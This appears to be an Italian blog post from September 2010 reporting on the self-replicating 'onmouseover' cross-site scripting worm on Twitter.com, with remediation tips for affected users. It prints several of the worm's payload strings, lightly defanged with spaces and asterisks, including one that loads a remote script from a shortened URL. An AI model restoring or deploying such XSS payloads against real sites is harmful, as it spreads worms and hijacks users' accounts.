Social Media Strategies & Web Marketing Solutions

Twitter.com – Ecco il Bug che lo sta mandando fuori controllo 21/09/2010

Da pochi minuti, Twitter è nel caos. La causa? Uno script, dalla viralità sorprendente, che si auto-replica al passaggio del mouse.

Lo speciale Script è il seguente:

NB: non sapendo come funzionano, ho “sfregiato” gli Script con spazi e *** in modo da neutralizzarli. :-P

http:// a.no/@”onmouseover***=”;$  (‘textarea:first’).val(this.innerHTML);$***(‘.status-update-form’).submit();”class=”modal-overlay”/

Personalmente, però, ne ho notate altre versioni. Ad esempio:

http:// t.co/@”style=”font-size:***999999999999px;”onmouseover  =”$***.getScript(‘http:\u002f\u002fis.gd\u002ffl9A7′)”/

http://a.no/@”onmouseover=”;$(‘textarea:f****irst’).val(this.innerHTML);$(‘.status-update-form’).submit()” style=”color:#000;background:#000;/

http:// t.co/@”onmouseover=”document  .getElementB****yId(‘status’).value=’RT Matsta’;$***(‘.status-update-form’).submit();”class=”modal-overlay”/

Credo ce ne siano altri. Hanno effetti diversi. Uno si auto-replica come Messaggio Diretto (DM), l’altro come Retweet e l’ultimo ha il nefasto effetto (almeno lo ha avuto per me) di bloccare completamente l’interfaccia di Twitter.com, sovrapponendole un Layer trasparente ma scuro che rende impossibile cliccare sugli oggetti sottostanti (quindi, ad esempio) annullare il RT.

Inizialmente, gli Script tendono ad apparire così:

Quella che vedete è una ricostruzione: a me ora si presentano “in chiaro” e non ho fatto lo Screenshot precedentemente. Mea culpa. Lo Script, comunque, si presenta come un Tweet normalissimo ma completamente nero. Se ci passate sopra col mouse – “Onmouseover” – lo Script si attiva e, a seconda della sua funzione individuale, si “Retweeta” da solo, tenta di inviare un Messaggio Diretto, apre una finestra di un sito esterno o blocca l’interfaccia Twitter.com .

Uno di questi Script (io, ovviamente, non potevo non testare la cosa) ha bloccato la mia intera interfaccia Twitter.com, tanto che mi era impossibile eliminare il Tweet. Con JavaScript attivo, il codice compariva in alto sulla pagina e tutta la stessa era “velata” da un Layer scuro. Al passaggio del mouse in un punto qualsiasi della pagina il Tweet con lo Script tentava di diffondersi via DM. Qui sotto, uno Screenshot preso al volo mentre uno degli Script tentava di auto-replicarsi:

In gergo tecnico, Twitter.com è vittima del “Cross-Site Scripting” (XSS). Per saperne di più, vedete il Link precedente o questo: The Cross-Site Scripting (XSS) FAQ .

Le applicazioni di terze parti, come HootSuite, TweetDeck e Seesmic, sono attualmente immuni dalla Security Flaw di Twitter.com . Sembra, quindi, sia sicuro accedere a Twitter tramite esse.

Cosa fare in caso di “infezione”?

- Ringraziare l’utente che ha dato inizio al tutto (c’è un Toto-Nomi che vede in testa gli utenti @judofyr e @RainbowTwtr);

- Accedere a Twitter tramite applicazioni di terze parti e tentare di eliminare da lì i Retweet “maligni”;

- Accedere a Twitter da mobile.twitter.com ed eliminare da lì i propri Retweet contenenti lo Script;

- Accedere a Twitter disattivando i JavaScript dal Browser (non sempre risolve);

- Cambiare (per sicurezza) la propria Password.

16:00

Da pochi minuti, Twitter ha annunciato di aver individuato e il Bug che ha reso possibile l’attacco e di essere al lavoro per correggerlo.

Risorse Utili

http://eu.techcrunch.com/2010/09/21/warning-mouseover-tweets-security-flaw-is-wreaking-havoc-on-twitter/

http://mashable.com/2010/09/21/twitter-mouseover-bug/

No comments

Leave a Reply